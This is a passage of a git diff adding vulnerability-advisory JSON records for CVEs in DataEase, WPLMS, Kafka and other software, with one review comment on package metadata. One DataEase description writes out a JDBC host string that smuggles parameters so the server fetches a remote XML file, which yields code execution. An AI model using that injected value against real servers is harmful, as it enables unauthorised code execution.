There are no known workarounds for this vulnerability.", + "reason": "Added CPE configurations because not yet analyzed by NVD.", + "references": [ + "https://github.com/kanboard/kanboard/blob/main/app/Core/Session/SessionHandler.php#L40", + "https://github.com/kanboard/kanboard/commit/7ce61c34d962ca8b5dce776289ddf4b207be6e78", + "https://github.com/kanboard/kanboard/security/advisories/GHSA-gv5c-8pxr-p484", + "https://www.php.net/manual/en/function.session-start.php", + "https://www.php.net/manual/en/session.configuration.php#ini.session.gc-divisor", + "https://www.php.net/manual/en/session.configuration.php#ini.session.gc-maxlifetime", + "https://www.php.net/manual/en/session.configuration.php#ini.session.gc-probability", + "https://www.php.net/manual/en/sessionhandlerinterface.gc.php" + ], + "upstream": { + "datePublished": "2024-12-18T23:52:57.327Z", + "dateReserved": "2024-12-09T14:22:52.524Z", + "dateUpdated": "2024-12-18T23:52:57.327Z", + "digest": "5d64d425b05102957b56d6653ffb1d9a1e71933f51f7be73247857a7e0790538" + } + }, + "adp": { + "affected": [ + { + "collectionURL": "https://github.com", + "cpes": [ + "cpe:2.3:a:kanboard:kanboard:*:*:*:*:*:*:*:*" + ], + "packageName": "kanboard/kanboard", + "product": "kanboard", + "repo": "https://github.com/kanboard/kanboard", + "vendor": "kanboard", + "versions": [ + { + "lessThan": "1.2.43", + "status": "affected", + "version": "0", + "versionType": "custom" + } + ] + } + ], + "providerMetadata": { + "orgId": "00000000-0000-4000-8000-000000000000", + "shortName": "anchoreadp" + } + } +} \ No newline at end of file diff --git a/data/anchore/2024/CVE-2024-55952.json b/data/anchore/2024/CVE-2024-55952.json new file mode 100644 index 00000000..0ec08099 --- /dev/null +++ b/data/anchore/2024/CVE-2024-55952.json 
@@ -0,0 +1,45 @@
+{
+ "additionalMetadata": {
+ "cna": "github_m",
+ "cveId": "CVE-2024-55952",
+ "description": "DataEase is an open source business analytics tool. Authenticated users can remotely execute code through the backend JDBC connection. When constructing the jdbc connection string, the parameters are not filtered. Constructing the host as ip:5432/test/?socketFactory=org.springframework.context.support.ClassPathXmlApplicationContext&socketFactoryArg=http://ip:5432/1.xml&a= can trigger the ClassPathXmlApplicationContext construction method. The vulnerability has been fixed in v1.18.27. Users are advised to upgrade. There are no known workarounds for this vulnerability.",
+ "reason": "Added CPE configurations because not yet analyzed by NVD.",
+ "references": [
+ "https://github.com/dataease/dataease/commit/0db4872a52eccf6e83dd9359aa05db52dd580ec1",
+ "https://github.com/dataease/dataease/security/advisories/GHSA-w8qm-xw38-93qw"
+ ],
+ "upstream": {
+ "datePublished": "2024-12-18T18:49:24.214Z",
+ "dateReserved": "2024-12-13T17:47:38.371Z",
+ "dateUpdated": "2024-12-18T19:16:19.747Z",
+ "digest": "e2fa6a8a95dd4aa2f488e58daa4bc9da30baf310939ce85cfa7f03ea74ffedd7"
+ }
+ },
+ "adp": {
+ "affected": [
+ {
+ "collectionURL": "https://github.com",
+ "cpes": [
+ "cpe:2.3:a:dataease:dataease:*:*:*:*:*:*:*:*",
+ "cpe:2.3:a:dataease_project:dataease:*:*:*:*:*:*:*:*"
+ ],
+ "packageName": "dataease/dataease",
+ "product": "dataease",
+ "repo": "https://github.com/dataease/dataease",
+ "vendor": "dataease",
+ "versions": [
+ {
+ "lessThan": "1.18.27",
+ "status": "affected",
+ "version": "0",
+ "versionType": "custom"
+ }
+ ]
+ }
+ ],
+ "providerMetadata": {
+ "orgId": "00000000-0000-4000-8000-000000000000",
+ "shortName": "anchoreadp"
+ }
+ }
+}
\ No newline at end of file
diff --git a/data/anchore/2024/CVE-2024-55953.json b/data/anchore/2024/CVE-2024-55953.json
new file mode 100644
index 00000000..ea8bd221
--- /dev/null
+++ b/data/anchore/2024/CVE-2024-55953.json
@@ -0,0 +1,45 @@
+{
+ "additionalMetadata": {
+ "cna": "github_m",
+ "cveId": "CVE-2024-55953",
+ "description": "DataEase is an open source business analytics tool. Authenticated users can read and deserialize arbitrary files through the background JDBC connection. When constructing the jdbc connection string, the parameters are not filtered. This vulnerability has been fixed in v1.18.27. Users are advised to upgrade. There are no known workarounds for this vulnerability.",
+ "reason": "Added CPE configurations because not yet analyzed by NVD.",
+ "references": [
+ "https://github.com/dataease/dataease/commit/0db4872a52eccf6e83dd9359aa05db52dd580ec1",
+ "https://github.com/dataease/dataease/security/advisories/GHSA-mrf3-9q84-rcmf"
+ ],
+ "upstream": {
+ "datePublished": "2024-12-18T18:49:21.632Z",
+ "dateReserved": "2024-12-13T17:47:38.371Z",
+ "dateUpdated": "2024-12-18T19:16:27.090Z",
+ "digest": "e2fa6a8a95dd4aa2f488e58daa4bc9da30baf310939ce85cfa7f03ea74ffedd7"
+ }
+ },
+ "adp": {
+ "affected": [
+ {
+ "collectionURL": "https://github.com",
+ "cpes": [
+ "cpe:2.3:a:dataease:dataease:*:*:*:*:*:*:*:*",
+ "cpe:2.3:a:dataease_project:dataease:*:*:*:*:*:*:*:*"
+ ],
+ "packageName": "dataease/dataease",
+ "product": "dataease",
+ "repo": "https://github.com/dataease/dataease",
+ "vendor": "dataease",
+ "versions": [
+ {
+ "lessThan": "1.18.27",
+ "status": "affected",
+ "version": "0",
+ "versionType": "custom"
+ }
+ ]
+ }
+ ],
+ "providerMetadata": {
+ "orgId": "00000000-0000-4000-8000-000000000000",
+ "shortName": "anchoreadp"
+ }
+ }
+}
\ No newline at end of file
diff --git a/data/anchore/2024/CVE-2024-55985.json b/data/anchore/2024/CVE-2024-55985.json
new file mode 100644
index 00000000..9e5c486e
--- /dev/null
+++ b/data/anchore/2024/CVE-2024-55985.json
@@ -0,0 +1,44 @@
+{
+ "additionalMetadata": {
+ "cna": "patchstack",
+ "cveId": "CVE-2024-55985",
+ "description": "Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in ydesignservices YDS Support Ticket System allows SQL Injection.This issue affects YDS Support Ticket System: from n/a through 1.0.",
+ "reason": "Added CPE configurations because not yet analyzed by NVD.",
+ "references": [
+ "https://patchstack.com/database/wordpress/plugin/yds-support-ticket-system/vulnerability/wordpress-yds-support-ticket-system-plugin-1-0-sql-injection-vulnerability?_s_id=cve"
+ ],
+ "upstream": {
+ "datePublished": "2024-12-18T11:38:22.533Z",
+ "dateReserved": "2024-12-14T19:41:53.295Z",
+ "dateUpdated": "2024-12-18T16:29:05.115Z",
+ "digest": "65364b028fe0f5d392b7d361361138d99a27aee41f2129c781c7ac68303fdfbe"
+ }
+ },
+ "adp": {
+ "affected": [
+ {
+ "collectionURL": "https://wordpress.org/plugins",
+ "cpes": [
+ "cpe:2.3:a:ydesignservices:yds_support_ticket_system:*:*:*:*:*:wordpress:*:*"
+ ],
+ "packageName": "yds-support-ticket-system",
+ "packageType": "wordpress-plugin",
+ "product": "YDS Support Ticket System",
+ "repo": "https://plugins.svn.wordpress.org/yds-support-ticket-system",
+ "vendor": "ydesignservices",
+ "versions": [
+ {
+ "lessThanOrEqual": "1.0",
+ "status": "affected",
+ "version": "0",
+ "versionType": "custom"
+ }
+ ]
+ }
+ ],
+ "providerMetadata": {
+ "orgId": "00000000-0000-4000-8000-000000000000",
+ "shortName": "anchoreadp"
+ }
+ }
+}
\ No newline at end of file
diff --git a/data/anchore/2024/CVE-2024-56047.json b/data/anchore/2024/CVE-2024-56047.json
new file mode 100644
index 00000000..2247f9a1
--- /dev/null
+++ b/data/anchore/2024/CVE-2024-56047.json
@@ -0,0 +1,46 @@
+{
+ "additionalMetadata": {
+ "cna": "patchstack",
+ "cveId": "CVE-2024-56047",
+ "description": "Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in VibeThemes WPLMS allows SQL Injection.This issue affects WPLMS: from n/a before 1.9.9.5.3.",
+ "reason": "Added CPE configurations because not yet analyzed by NVD.",
+ "references": [
+ "https://patchstack.com/database/wordpress/plugin/wplms-plugin/vulnerability/wordpress-wplms-plugin-1-9-9-5-3-subscriber-sql-injection-vulnerability?_s_id=cve"
+ ],
+ "solutions": [
+ "Update the WordPress WPLMS plugin to the latest available version (at least 1.9.9.5.3)."
+ ],
+ "upstream": {
+ "datePublished": "2024-12-18T18:58:59.505Z",
+ "dateReserved": "2024-12-14T19:42:58.219Z",
+ "dateUpdated": "2024-12-18T19:15:17.846Z",
+ "digest": "73da59f55e08a867076d099982ec97bf302e785e5b33d372d2ce48bd3d4d2c42"
+ }
+ },
+ "adp": {
+ "affected": [
+ {
+ "collectionURL": "https://themeforest.net",
+ "cpes": [
+ "cpe:2.3:a:vibethemes:wordpress_learning_management_system_:*:*:*:*:*:wordpress:*:*"
+ ],
+ "packageName": "wplms",
+ "packageType": "wordpress-theme",
+ "product": "WPLMS",
+ "vendor": "VibeThemes",
+ "versions": [
+ {
+ "lessThan": "1.9.9.5.3",
+ "status": "affected",
+ "version": "0",
+ "versionType": "custom"
+ }
+ ]
+ }
+ ],
+ "providerMetadata": {
+ "orgId": "00000000-0000-4000-8000-000000000000",
+ "shortName": "anchoreadp"
+ }
+ }
+}
\ No newline at end of file
diff --git a/data/anchore/2024/CVE-2024-56048.json b/data/anchore/2024/CVE-2024-56048.json
new file mode 100644
index 00000000..e0c41839
--- /dev/null
+++ b/data/anchore/2024/CVE-2024-56048.json
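Review bot: The `affected` entry identifies the product as a ThemeForest theme (`"packageType": "wordpress-theme"`, `"collectionURL": "https://themeforest.net"`, `"packageName": "wplms"`), while the reference URL slug is `wordpress/plugin/wplms-plugin` and the `solutions` text says to update the WPLMS plugin. If the bound `1.9.9.5.3` is the plugin's version, a scanner matching on the theme could flag the wrong component or miss the vulnerable one; confirm which is meant and, if it is the plugin, use `"packageType": "wordpress-plugin"` with `"packageName": "wplms-plugin"`. The CPE product `wordpress_learning_management_system_` also ends in an underscore, which looks like a normalisation artifact and should be checked against the CPE dictionary. The same applies to the records for CVE-2024-56048 through CVE-2024-56055 and CVE-2024-56057 in this commit.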
@@ -0,0 +1,46 @@
+{
+ "additionalMetadata": {
+ "cna": "patchstack",
+ "cveId": "CVE-2024-56048",
+ "description": "Missing Authorization vulnerability in VibeThemes WPLMS allows Accessing Functionality Not Properly Constrained by ACLs.This issue affects WPLMS: from n/a through 1.9.9.",
+ "reason": "Added CPE configurations because not yet analyzed by NVD.",
+ "references": [
+ "https://patchstack.com/database/wordpress/plugin/wplms-plugin/vulnerability/wordpress-wplms-plugin-1-9-9-arbitrary-option-update-to-privilege-escalation-vulnerability?_s_id=cve"
+ ],
+ "solutions": [
+ "Update the WordPress WPLMS plugin to the latest available version (at least 1.9.9.1)."
+ ],
+ "upstream": {
+ "datePublished": "2024-12-18T18:57:27.446Z",
+ "dateReserved": "2024-12-14T19:42:58.219Z",
+ "dateUpdated": "2024-12-18T19:15:30.469Z",
+ "digest": "3ccb97e9b172197eed843b99933e58a83d16a06c152227c32813e59da8ae31ff"
+ }
+ },
+ "adp": {
+ "affected": [
+ {
+ "collectionURL": "https://themeforest.net",
+ "cpes": [
+ "cpe:2.3:a:vibethemes:wordpress_learning_management_system_:*:*:*:*:*:wordpress:*:*"
+ ],
+ "packageName": "wplms",
+ "packageType": "wordpress-theme",
+ "product": "WPLMS",
+ "vendor": "VibeThemes",
+ "versions": [
+ {
+ "lessThanOrEqual": "1.9.9",
+ "status": "affected",
+ "version": "0",
+ "versionType": "custom"
+ }
+ ]
+ }
+ ],
+ "providerMetadata": {
+ "orgId": "00000000-0000-4000-8000-000000000000",
+ "shortName": "anchoreadp"
+ }
+ }
+}
\ No newline at end of file
diff --git a/data/anchore/2024/CVE-2024-56049.json b/data/anchore/2024/CVE-2024-56049.json
new file mode 100644
index 00000000..a47a18d0
--- /dev/null
+++ b/data/anchore/2024/CVE-2024-56049.json
@@ -0,0 +1,46 @@
+{
+ "additionalMetadata": {
+ "cna": "patchstack",
+ "cveId": "CVE-2024-56049",
+ "description": "Path Traversal: '.../...//' vulnerability in VibeThemes WPLMS allows Path Traversal.This issue affects WPLMS: from n/a before 1.9.9.5.2.",
+ "reason": "Added CPE configurations because not yet analyzed by NVD.",
+ "references": [
+ "https://patchstack.com/database/wordpress/plugin/wplms-plugin/vulnerability/wordpress-wplms-plugin-1-9-9-5-2-subscriber-arbitrary-file-deletion-vulnerability?_s_id=cve"
+ ],
+ "solutions": [
+ "Update the WordPress WPLMS plugin to the latest available version (at least 1.9.9.5.2)."
+ ],
+ "upstream": {
+ "datePublished": "2024-12-18T18:46:23.626Z",
+ "dateReserved": "2024-12-14T19:42:58.219Z",
+ "dateUpdated": "2024-12-18T19:16:42.161Z",
+ "digest": "992428dc1cb8fff9ae5944623f4a5e4a79db9c1006c8c9aa144ae9d85139d26a"
+ }
+ },
+ "adp": {
+ "affected": [
+ {
+ "collectionURL": "https://themeforest.net",
+ "cpes": [
+ "cpe:2.3:a:vibethemes:wordpress_learning_management_system_:*:*:*:*:*:wordpress:*:*"
+ ],
+ "packageName": "wplms",
+ "packageType": "wordpress-theme",
+ "product": "WPLMS",
+ "vendor": "VibeThemes",
+ "versions": [
+ {
+ "lessThan": "1.9.9.5.2",
+ "status": "affected",
+ "version": "0",
+ "versionType": "custom"
+ }
+ ]
+ }
+ ],
+ "providerMetadata": {
+ "orgId": "00000000-0000-4000-8000-000000000000",
+ "shortName": "anchoreadp"
+ }
+ }
+}
\ No newline at end of file
diff --git a/data/anchore/2024/CVE-2024-56050.json b/data/anchore/2024/CVE-2024-56050.json
new file mode 100644
index 00000000..45518616
--- /dev/null
+++ b/data/anchore/2024/CVE-2024-56050.json
@@ -0,0 +1,46 @@
+{
+ "additionalMetadata": {
+ "cna": "patchstack",
+ "cveId": "CVE-2024-56050",
+ "description": "Unrestricted Upload of File with Dangerous Type vulnerability in VibeThemes WPLMS allows Upload a Web Shell to a Web Server.This issue affects WPLMS: from n/a before 1.9.9.5.3.",
+ "reason": "Added CPE configurations because not yet analyzed by NVD.",
+ "references": [
+ "https://patchstack.com/database/wordpress/plugin/wplms-plugin/vulnerability/wordpress-wplms-plugin-1-9-9-5-3-subscriber-arbitrary-file-upload-vulnerability?_s_id=cve"
+ ],
+ "solutions": [
+ "Update the WordPress WPLMS plugin to the latest available version (at least 1.9.9.5.3)."
+ ],
+ "upstream": {
+ "datePublished": "2024-12-18T18:56:30.596Z",
+ "dateReserved": "2024-12-14T19:42:58.219Z",
+ "dateUpdated": "2024-12-18T19:15:41.175Z",
+ "digest": "73da59f55e08a867076d099982ec97bf302e785e5b33d372d2ce48bd3d4d2c42"
+ }
+ },
+ "adp": {
+ "affected": [
+ {
+ "collectionURL": "https://themeforest.net",
+ "cpes": [
+ "cpe:2.3:a:vibethemes:wordpress_learning_management_system_:*:*:*:*:*:wordpress:*:*"
+ ],
+ "packageName": "wplms",
+ "packageType": "wordpress-theme",
+ "product": "WPLMS",
+ "vendor": "VibeThemes",
+ "versions": [
+ {
+ "lessThan": "1.9.9.5.3",
+ "status": "affected",
+ "version": "0",
+ "versionType": "custom"
+ }
+ ]
+ }
+ ],
+ "providerMetadata": {
+ "orgId": "00000000-0000-4000-8000-000000000000",
+ "shortName": "anchoreadp"
+ }
+ }
+}
\ No newline at end of file
diff --git a/data/anchore/2024/CVE-2024-56051.json b/data/anchore/2024/CVE-2024-56051.json
new file mode 100644
index 00000000..bf99be96
--- /dev/null
+++ b/data/anchore/2024/CVE-2024-56051.json
@@ -0,0 +1,46 @@
+{
+ "additionalMetadata": {
+ "cna": "patchstack",
+ "cveId": "CVE-2024-56051",
+ "description": "Improper Control of Generation of Code ('Code Injection') vulnerability in VibeThemes WPLMS allows Code Injection.This issue affects WPLMS: from n/a before 1.9.9.5.",
+ "reason": "Added CPE configurations because not yet analyzed by NVD.",
+ "references": [
+ "https://patchstack.com/database/wordpress/plugin/wplms-plugin/vulnerability/wordpress-wplms-plugin-1-9-9-5-student-remote-code-execution-rce-vulnerability?_s_id=cve"
+ ],
+ "solutions": [
+ "Update the WordPress WPLMS plugin to the latest available version (at least 1.9.9.5)."
+ ],
+ "upstream": {
+ "datePublished": "2024-12-18T18:41:39.681Z",
+ "dateReserved": "2024-12-14T19:42:58.219Z",
+ "dateUpdated": "2024-12-18T18:49:26.763Z",
+ "digest": "eb71a7edc5e31cf36095ef21cef111ede792165ead4935a85f0226960a8db2ea"
+ }
+ },
+ "adp": {
+ "affected": [
+ {
+ "collectionURL": "https://themeforest.net",
+ "cpes": [
+ "cpe:2.3:a:vibethemes:wordpress_learning_management_system_:*:*:*:*:*:wordpress:*:*"
+ ],
+ "packageName": "wplms",
+ "packageType": "wordpress-theme",
+ "product": "WPLMS",
+ "vendor": "VibeThemes",
+ "versions": [
+ {
+ "lessThan": "1.9.9.5",
+ "status": "affected",
+ "version": "0",
+ "versionType": "custom"
+ }
+ ]
+ }
+ ],
+ "providerMetadata": {
+ "orgId": "00000000-0000-4000-8000-000000000000",
+ "shortName": "anchoreadp"
+ }
+ }
+}
\ No newline at end of file
diff --git a/data/anchore/2024/CVE-2024-56052.json b/data/anchore/2024/CVE-2024-56052.json
new file mode 100644
index 00000000..b58bb91c
--- /dev/null
+++ b/data/anchore/2024/CVE-2024-56052.json
@@ -0,0 +1,46 @@
+{
+ "additionalMetadata": {
+ "cna": "patchstack",
+ "cveId": "CVE-2024-56052",
+ "description": "Unrestricted Upload of File with Dangerous Type vulnerability in VibeThemes WPLMS allows Upload a Web Shell to a Web Server.This issue affects WPLMS: from n/a before 1.9.9.5.2.",
+ "reason": "Added CPE configurations because not yet analyzed by NVD.",
+ "references": [
+ "https://patchstack.com/database/wordpress/plugin/wplms-plugin/vulnerability/wordpress-wplms-plugin-1-9-9-5-2-student-arbitrary-file-upload-vulnerability?_s_id=cve"
+ ],
+ "solutions": [
+ "Update the WordPress WPLMS plugin to the latest available version (at least 1.9.9.5.2)."
+ ],
+ "upstream": {
+ "datePublished": "2024-12-18T18:55:19.251Z",
+ "dateReserved": "2024-12-14T19:43:05.898Z",
+ "dateUpdated": "2024-12-18T19:15:48.973Z",
+ "digest": "992428dc1cb8fff9ae5944623f4a5e4a79db9c1006c8c9aa144ae9d85139d26a"
+ }
+ },
+ "adp": {
+ "affected": [
+ {
+ "collectionURL": "https://themeforest.net",
+ "cpes": [
+ "cpe:2.3:a:vibethemes:wordpress_learning_management_system_:*:*:*:*:*:wordpress:*:*"
+ ],
+ "packageName": "wplms",
+ "packageType": "wordpress-theme",
+ "product": "WPLMS",
+ "vendor": "VibeThemes",
+ "versions": [
+ {
+ "lessThan": "1.9.9.5.2",
+ "status": "affected",
+ "version": "0",
+ "versionType": "custom"
+ }
+ ]
+ }
+ ],
+ "providerMetadata": {
+ "orgId": "00000000-0000-4000-8000-000000000000",
+ "shortName": "anchoreadp"
+ }
+ }
+}
\ No newline at end of file
diff --git a/data/anchore/2024/CVE-2024-56053.json b/data/anchore/2024/CVE-2024-56053.json
new file mode 100644
index 00000000..a762dc2c
--- /dev/null
+++ b/data/anchore/2024/CVE-2024-56053.json
@@ -0,0 +1,46 @@
+{
+ "additionalMetadata": {
+ "cna": "patchstack",
+ "cveId": "CVE-2024-56053",
+ "description": "Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in VibeThemes WPLMS allows SQL Injection.This issue affects WPLMS: from n/a before 1.9.9.5.3.",
+ "reason": "Added CPE configurations because not yet analyzed by NVD.",
+ "references": [
+ "https://patchstack.com/database/wordpress/plugin/wplms-plugin/vulnerability/wordpress-wplms-plugin-1-9-9-5-3-instructor-sql-injection-vulnerability?_s_id=cve"
+ ],
+ "solutions": [
+ "Update the WordPress WPLMS plugin to the latest available version (at least 1.9.9.5.3)."
+ ],
+ "upstream": {
+ "datePublished": "2024-12-18T18:58:14.866Z",
+ "dateReserved": "2024-12-14T19:43:05.899Z",
+ "dateUpdated": "2024-12-18T19:15:23.880Z",
+ "digest": "73da59f55e08a867076d099982ec97bf302e785e5b33d372d2ce48bd3d4d2c42"
+ }
+ },
+ "adp": {
+ "affected": [
+ {
+ "collectionURL": "https://themeforest.net",
+ "cpes": [
+ "cpe:2.3:a:vibethemes:wordpress_learning_management_system_:*:*:*:*:*:wordpress:*:*"
+ ],
+ "packageName": "wplms",
+ "packageType": "wordpress-theme",
+ "product": "WPLMS",
+ "vendor": "VibeThemes",
+ "versions": [
+ {
+ "lessThan": "1.9.9.5.3",
+ "status": "affected",
+ "version": "0",
+ "versionType": "custom"
+ }
+ ]
+ }
+ ],
+ "providerMetadata": {
+ "orgId": "00000000-0000-4000-8000-000000000000",
+ "shortName": "anchoreadp"
+ }
+ }
+}
\ No newline at end of file
diff --git a/data/anchore/2024/CVE-2024-56054.json b/data/anchore/2024/CVE-2024-56054.json
new file mode 100644
index 00000000..4e777a64
--- /dev/null
+++ b/data/anchore/2024/CVE-2024-56054.json
@@ -0,0 +1,46 @@
+{
+ "additionalMetadata": {
+ "cna": "patchstack",
+ "cveId": "CVE-2024-56054",
+ "description": "Unrestricted Upload of File with Dangerous Type vulnerability in VibeThemes WPLMS allows Upload a Web Shell to a Web Server.This issue affects WPLMS: from n/a before 1.9.9.5.2.",
+ "reason": "Added CPE configurations because not yet analyzed by NVD.",
+ "references": [
+ "https://patchstack.com/database/wordpress/plugin/wplms-plugin/vulnerability/wordpress-wplms-plugin-1-9-9-5-2-instructor-arbitrary-file-upload-vulnerability?_s_id=cve"
+ ],
+ "solutions": [
+ "Update the WordPress WPLMS plugin to the latest available version (at least 1.9.9.5.2)."
+ ],
+ "upstream": {
+ "datePublished": "2024-12-18T18:53:51.053Z",
+ "dateReserved": "2024-12-14T19:43:05.900Z",
+ "dateUpdated": "2024-12-18T19:15:55.569Z",
+ "digest": "992428dc1cb8fff9ae5944623f4a5e4a79db9c1006c8c9aa144ae9d85139d26a"
+ }
+ },
+ "adp": {
+ "affected": [
+ {
+ "collectionURL": "https://themeforest.net",
+ "cpes": [
+ "cpe:2.3:a:vibethemes:wordpress_learning_management_system_:*:*:*:*:*:wordpress:*:*"
+ ],
+ "packageName": "wplms",
+ "packageType": "wordpress-theme",
+ "product": "WPLMS",
+ "vendor": "VibeThemes",
+ "versions": [
+ {
+ "lessThan": "1.9.9.5.2",
+ "status": "affected",
+ "version": "0",
+ "versionType": "custom"
+ }
+ ]
+ }
+ ],
+ "providerMetadata": {
+ "orgId": "00000000-0000-4000-8000-000000000000",
+ "shortName": "anchoreadp"
+ }
+ }
+}
\ No newline at end of file
diff --git a/data/anchore/2024/CVE-2024-56055.json b/data/anchore/2024/CVE-2024-56055.json
new file mode 100644
index 00000000..5f162593
--- /dev/null
+++ b/data/anchore/2024/CVE-2024-56055.json
@@ -0,0 +1,46 @@
+{
+ "additionalMetadata": {
+ "cna": "patchstack",
+ "cveId": "CVE-2024-56055",
+ "description": "Path Traversal: '.../...//' vulnerability in VibeThemes WPLMS allows Path Traversal.This issue affects WPLMS: from n/a before 1.9.9.5.2.",
+ "reason": "Added CPE configurations because not yet analyzed by NVD.",
+ "references": [
+ "https://patchstack.com/database/wordpress/plugin/wplms-plugin/vulnerability/wordpress-wplms-plugin-1-9-9-5-2-arbitrary-directory-deletion-vulnerability?_s_id=cve"
+ ],
+ "solutions": [
+ "Update the WordPress WPLMS plugin to the latest available version (at least 1.9.9.5.2)."
+ ],
+ "upstream": {
+ "datePublished": "2024-12-18T18:42:49.539Z",
+ "dateReserved": "2024-12-14T19:43:05.900Z",
+ "dateUpdated": "2024-12-18T19:02:18.760Z",
+ "digest": "992428dc1cb8fff9ae5944623f4a5e4a79db9c1006c8c9aa144ae9d85139d26a"
+ }
+ },
+ "adp": {
+ "affected": [
+ {
+ "collectionURL": "https://themeforest.net",
+ "cpes": [
+ "cpe:2.3:a:vibethemes:wordpress_learning_management_system_:*:*:*:*:*:wordpress:*:*"
+ ],
+ "packageName": "wplms",
+ "packageType": "wordpress-theme",
+ "product": "WPLMS",
+ "vendor": "VibeThemes",
+ "versions": [
+ {
+ "lessThan": "1.9.9.5.2",
+ "status": "affected",
+ "version": "0",
+ "versionType": "custom"
+ }
+ ]
+ }
+ ],
+ "providerMetadata": {
+ "orgId": "00000000-0000-4000-8000-000000000000",
+ "shortName": "anchoreadp"
+ }
+ }
+}
\ No newline at end of file
diff --git a/data/anchore/2024/CVE-2024-56057.json b/data/anchore/2024/CVE-2024-56057.json
new file mode 100644
index 00000000..72f3f79c
--- /dev/null
+++ b/data/anchore/2024/CVE-2024-56057.json
@@ -0,0 +1,46 @@
+{
+ "additionalMetadata": {
+ "cna": "patchstack",
+ "cveId": "CVE-2024-56057",
+ "description": "Unrestricted Upload of File with Dangerous Type vulnerability in VibeThemes WPLMS allows Upload a Web Shell to a Web Server.This issue affects WPLMS: from n/a before 1.9.9.5.2.",
+ "reason": "Added CPE configurations because not yet analyzed by NVD.",
+ "references": [
+ "https://patchstack.com/database/wordpress/plugin/wplms-plugin/vulnerability/wordpress-wplms-plugin-1-9-9-5-2-arbitrary-file-upload-vulnerability?_s_id=cve"
+ ],
+ "solutions": [
+ "Update the WordPress WPLMS plugin to the latest available version (at least 1.9.9.5.2)."
+ ],
+ "upstream": {
+ "datePublished": "2024-12-18T18:52:17.015Z",
+ "dateReserved": "2024-12-14T19:43:05.902Z",
+ "dateUpdated": "2024-12-18T19:16:02.939Z",
+ "digest": "992428dc1cb8fff9ae5944623f4a5e4a79db9c1006c8c9aa144ae9d85139d26a"
+ }
+ },
+ "adp": {
+ "affected": [
+ {
+ "collectionURL": "https://themeforest.net",
+ "cpes": [
+ "cpe:2.3:a:vibethemes:wordpress_learning_management_system_:*:*:*:*:*:wordpress:*:*"
+ ],
+ "packageName": "wplms",
+ "packageType": "wordpress-theme",
+ "product": "WPLMS",
+ "vendor": "VibeThemes",
+ "versions": [
+ {
+ "lessThan": "1.9.9.5.2",
+ "status": "affected",
+ "version": "0",
+ "versionType": "custom"
+ }
+ ]
+ }
+ ],
+ "providerMetadata": {
+ "orgId": "00000000-0000-4000-8000-000000000000",
+ "shortName": "anchoreadp"
+ }
+ }
+}
\ No newline at end of file
diff --git a/data/anchore/2024/CVE-2024-56128.json b/data/anchore/2024/CVE-2024-56128.json
new file mode 100644
index 00000000..1a000803
--- /dev/null
+++ b/data/anchore/2024/CVE-2024-56128.json
@@ -0,0 +1,53 @@ +{ + "additionalMetadata": { + "cna": "apache", + "cveId": "CVE-2024-56128", + "description": "Incorrect Implementation of Authentication Algorithm in Apache Kafka's SCRAM implementation.\n\nIssue Summary:\nApache Kafka's implementation of the Salted Challenge Response Authentication Mechanism (SCRAM) did not fully adhere to the requirements of RFC 5802 [1].\nSpecifically, as per RFC 5802, the server must verify that the nonce sent by the client in the second message matches the nonce sent by the server in its first message.\nHowever, Kafka's SCRAM implementation did not perform this validation.\n\nImpact:\nThis vulnerability is exploitable only when an attacker has plaintext access to the SCRAM authentication exchange. However, the usage of SCRAM over plaintext is strongly\ndiscouraged as it is considered an insecure practice [2]. Apache Kafka recommends deploying SCRAM exclusively with TLS encryption to protect SCRAM exchanges from interception [3].\nDeployments using SCRAM with TLS are not affected by this issue.\n\nHow to Detect If You Are Impacted:\nIf your deployment uses SCRAM authentication over plaintext communication channels (without TLS encryption), you are likely impacted.\nTo check if TLS is enabled, review your server.properties configuration file for listeners property. 
If you have SASL_PLAINTEXT in the listeners, then you are likely impacted.\n\nFix Details:\nThe issue has been addressed by introducing nonce verification in the final message of the SCRAM authentication exchange to ensure compliance with RFC 5802.\n\nAffected Versions:\nApache Kafka versions 0.10.2.0 through 3.9.0, excluding the fixed versions below.\n\nFixed Versions:\n3.9.0\n3.8.1\n3.7.2\n\nUsers are advised to upgrade to 3.7.2 or later to mitigate this issue.\n\nRecommendations for Mitigation:\nUsers unable to upgrade to the fixed versions can mitigate the issue by:\n- Using TLS with SCRAM Authentication:\nAlways deploy SCRAM over TLS to encrypt authentication exchanges and protect against interception.\n- Considering Alternative Authentication Mechanisms:\nEvaluate alternative authentication mechanisms, such as PLAIN, Kerberos or OAuth with TLS, which provide additional layers of security.", + "reason": "Added CPE configurations because not yet analyzed by NVD.", + "references": [ + "https://datatracker.ietf.org/doc/html/rfc5802", + "https://datatracker.ietf.org/doc/html/rfc5802#section-9", + "https://kafka.apache.org/documentation/#security_sasl_scram_security", + "https://lists.apache.org/thread/84dh4so32lwn7wr6c5s9mwh381vx9wkw" + ], + "upstream": { + "datePublished": "2024-12-18T13:38:03.068Z", + "dateReserved": "2024-12-16T14:52:48.326Z", + "dateUpdated": "2024-12-18T17:02:47.926Z", + "digest": "598da8953ca50d00c140ea85768fa1efda78795b2c1aec28148e878a87042d89" + } + }, + "adp": { + "affected": [ + { + "collectionURL": "https://repo.maven.apache.org/maven2", + "cpes": [ + "cpe:2.3:a:apache:kafka:*:*:*:*:*:maven:*:*", + "cpe:2.3:a:org.apache.kafka:kafka:*:*:*:*:*:maven:*:*" + ], + "packageName": "org.apache.kafka:kafka", + "packageType": "maven", + "product": "Apache Kafka", + "vendor": "Apache Software Foundation", + "versions": [ + { + "lessThan": "3.7.2", + "status": "affected", + "version": "0.10.2.0", + "versionType": "semver" + }, + { + "lessThan": 
"3.8.1", + "status": "affected", + "version": "3.8.0", + "versionType": "semver" + } + ] + } + ], + "providerMetadata": { + "orgId": "00000000-0000-4000-8000-000000000000", + "shortName": "anchoreadp" + } + } +} \ No newline at end of file diff --git a/data/anchore/2024/CVE-2024-56145.json b/data/anchore/2024/CVE-2024-56145.json new file mode 100644 index 00000000..9a734def --- /dev/null +++ b/data/anchore/2024/CVE-2024-56145.json 
